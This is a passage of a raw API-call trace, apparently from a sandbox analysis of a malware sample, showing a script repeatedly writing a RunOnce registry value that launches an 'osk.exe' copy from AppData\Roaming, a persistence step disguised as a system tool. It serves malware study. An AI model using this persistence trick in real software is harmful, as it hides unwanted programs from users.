Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.473] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.473] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.473] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.473] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3d [0079.473] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.473] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3e [0079.473] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.474] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3d [0079.474] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.474] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.474] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.474] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.474] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.474] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.474] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.474] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.475] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.475] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.475] RegCloseKey (hKey=0x280) returned 0x0 [0079.475] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.475] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.475] SetTimer (hWnd=0x20280, nIDEvent=0x203d, uElapse=0xa, lpTimerFunc=0x0) returned 0x203d [0079.475] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.487] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.487] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.488] KillTimer (hWnd=0x20280, uIDEvent=0x203d) returned 1 [0079.488] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.488] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.488] IUnknown:Release (This=0x787518) returned 0x1 [0079.488] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.488] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.488] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.489] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.489] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.489] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.489] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.489] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.489] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.489] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3e [0079.489] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.489] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3f [0079.489] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.490] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3e [0079.490] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.490] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.490] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.490] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.490] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.490] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.490] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.490] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.490] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.490] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.491] RegCloseKey (hKey=0x280) returned 0x0 [0079.491] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.491] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.491] SetTimer (hWnd=0x20280, nIDEvent=0x203e, uElapse=0xa, lpTimerFunc=0x0) returned 0x203e [0079.491] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.503] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.503] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.503] KillTimer (hWnd=0x20280, uIDEvent=0x203e) returned 1 [0079.503] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.503] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.504] IUnknown:Release (This=0x787518) returned 0x1 [0079.504] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.504] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.504] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.504] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.504] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.504] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.504] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.504] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.504] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.504] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3f [0079.504] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.504] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x40 [0079.504] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.505] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3f [0079.505] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.505] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.505] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.505] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.505] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.505] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.506] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.506] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.506] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.506] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.506] RegCloseKey (hKey=0x280) returned 0x0 [0079.506] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.506] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.506] SetTimer (hWnd=0x20280, nIDEvent=0x203f, uElapse=0xa, lpTimerFunc=0x0) returned 0x203f [0079.506] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.519] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.519] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.519] KillTimer (hWnd=0x20280, uIDEvent=0x203f) returned 1 [0079.519] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.519] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.519] IUnknown:Release (This=0x787518) returned 0x1 [0079.519] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.519] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.519] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.520] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.520] FileSystemObject:IUnknown:QueryInterface (in: 